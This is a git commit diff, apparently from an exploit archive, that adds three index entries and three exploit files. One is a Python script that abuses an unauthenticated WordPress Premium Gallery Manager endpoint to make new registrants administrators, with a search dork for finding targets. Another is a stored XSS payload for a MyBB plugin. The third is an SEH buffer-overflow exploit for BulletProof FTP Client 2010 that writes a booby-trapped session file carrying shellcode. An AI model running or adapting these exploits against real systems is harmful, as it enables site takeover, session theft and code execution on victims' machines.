Updated 09_07_2014
This commit is contained in:
parent
bdd1b1c20a
commit
fe6788f41b
4 changed files with 113 additions and 0 deletions
|
@ -31104,3 +31104,6 @@ id,file,description,date,author,platform,type,port
|
|||
34534,platforms/php/webapps/34534.txt,"TCMS Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
|
||||
34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
|
||||
34536,platforms/php/webapps/34536.txt,"CompuCMS Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
|
||||
34538,platforms/php/webapps/34538.txt,"Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability",2014-09-05,Hannaichi,php,webapps,80
|
||||
34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Stored XSS",2014-09-05,"Fikri Fadzil",php,webapps,80
|
||||
34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit",2014-09-05,"Robert Kugler",windows,dos,0
|
||||
|
|
Can't render this file because it is too large.
|
43
platforms/php/webapps/34538.txt
Executable file
43
platforms/php/webapps/34538.txt
Executable file
|
@ -0,0 +1,43 @@
|
|||
#Exploit Title : Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability
|
||||
#Author : Hannaichi [@dntkun]
|
||||
#Date : February 5th, 2014
|
||||
#Type : php, html, htm, asp, etc.
|
||||
#Category : Web Applications
|
||||
#Vulnerability : Unauthenticated Configuration Access
|
||||
#Tested On : Windows 7 32-bit | Google Chrome
|
||||
|
||||
#Dork : inurl:/wp-content/plugins/premium_gallery_manager/ | USE YOUR BRAIN =))
|
||||
|
||||
#Exploit : http://victim/[PATH]/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php
|
||||
|
||||
#POC :
|
||||
Save File As Python (.py) =
|
||||
import httplib, urllib
|
||||
|
||||
#target site
|
||||
site = "victim" #<--- no http:// or https://
|
||||
#path to ajax.php
|
||||
url = "/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php"
|
||||
|
||||
def ChangeOption(site, url, option_name, option_value):
|
||||
params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
|
||||
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
|
||||
conn = httplib.HTTPConnection(site)
|
||||
conn.request("POST", url, params, headers)
|
||||
response = conn.getresponse()
|
||||
print response.status, response.reason
|
||||
data = response.read()
|
||||
print data
|
||||
conn.close()
|
||||
|
||||
ChangeOption(site, url, "admin_email", "youremail@test.com")
|
||||
ChangeOption(site, url, "users_can_register", "1")
|
||||
ChangeOption(site, url, "default_role", "administrator")
|
||||
print "Now register a new user, they are an administrator by default!"
|
||||
|
||||
|
||||
#Place It Broo No Lazy For This :D !!
|
||||
|
||||
--------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
Thanks to: #AnonSec Hackers - Borneo Security - Bekantan Crew - Indonesian Hacker - Muslim Hacker - You :*
|
30
platforms/php/webapps/34539.txt
Executable file
30
platforms/php/webapps/34539.txt
Executable file
|
@ -0,0 +1,30 @@
|
|||
# Exploit Title: User Social Networks MyBB Plugin 1.2 - Cross Site Scripting
|
||||
# Google Dork: N/A
|
||||
# Date: 05.09.2014
|
||||
# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
|
||||
# Vendor Homepage - N/A
|
||||
# Software Link: http://mods.mybb.com/view/user-social-networks
|
||||
# Version: 1.2
|
||||
# Tested on: PHP
|
||||
|
||||
|
||||
Description:
|
||||
This plugin allows you to add social networks, or related, in user
|
||||
profiles. The information will be shown in a user profile and visible for
|
||||
anyone who view the profile.
|
||||
|
||||
Proof of Concept
|
||||
1. Login into your account.
|
||||
2. Go to "Edit Profile" page at "/usercp.php?action=profile"
|
||||
3. Update your Social Network ID with
|
||||
"><script>alert(document.cookie)</script><"
|
||||
4. The result can be seen in multiple places, including your profile page.
|
||||
|
||||
* The script will be executed whenever anyone view your profile.
|
||||
** The result can also be seen in threads you involve IF the administrator
|
||||
configure this plugin to allow user's social sites information to be
|
||||
published in every post.
|
||||
|
||||
Solution:
|
||||
Replace the content of "inc/plugins/usersocial.php" with this fix:
|
||||
http://pastebin.com/T1WgcwDB
|
37
platforms/windows/dos/34540.py
Executable file
37
platforms/windows/dos/34540.py
Executable file
|
@ -0,0 +1,37 @@
|
|||
# !/usr/bin/python
|
||||
#-----------------------------------------------------------------------------#
|
||||
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit #
|
||||
# Date: Sep 05 2014 #
|
||||
# Vulnerability Discovery: Gabor Seljan #
|
||||
# Exploit Author: Robert Kugler #
|
||||
# Software Link: http://www.bpftp.com/ #
|
||||
# Version: 2010.75.0.76 #
|
||||
# Tested on: Windows XP #
|
||||
# CVE: CVE-2014-2973 #
|
||||
# #
|
||||
# Thanks to corelanc0d3r for his awesome tutorials and help! ;-) #
|
||||
# The "Enter URL" form is also vulnerable #
|
||||
#-----------------------------------------------------------------------------#
|
||||
|
||||
buffer = "This is a BulletProof FTP Client Session-File and should not be modified directly.\n"
|
||||
buffer+= "\x20" + "\x90" * 89
|
||||
buffer+= "\xeb\x06\x90\x90"
|
||||
buffer+= "\xA0\xB3\x3C\x77" # shell32.dll pop pop ret @773CB3A0
|
||||
buffer+= "\x90" * 119 # 160 characters space
|
||||
buffer+= ("\x33\xc0\x50\x68"
|
||||
"\x2E\x65\x78\x65"
|
||||
"\x68\x63\x61\x6C"
|
||||
"\x63\x8B\xC4\x6A" # 36 bytes
|
||||
"\x01\x50\xBB\x35" # ExitProcess is located at 0x77e598fd in kernel32.dll
|
||||
"\xfd\xe4\x77\xFF"
|
||||
"\xD3\x33\xc0\x50"
|
||||
"\xc7\xc0\x8f\x4a"
|
||||
"\xe5\x77\xff\xe0")
|
||||
|
||||
buffer+= "\x90" * (1000 - len(buffer))
|
||||
|
||||
# Just load the "BP Session" and click on "Connect".
|
||||
|
||||
file = open("ftpsession.bps","w")
|
||||
file.write(buffer)
|
||||
file.close()
|
Loading…
Add table
Reference in a new issue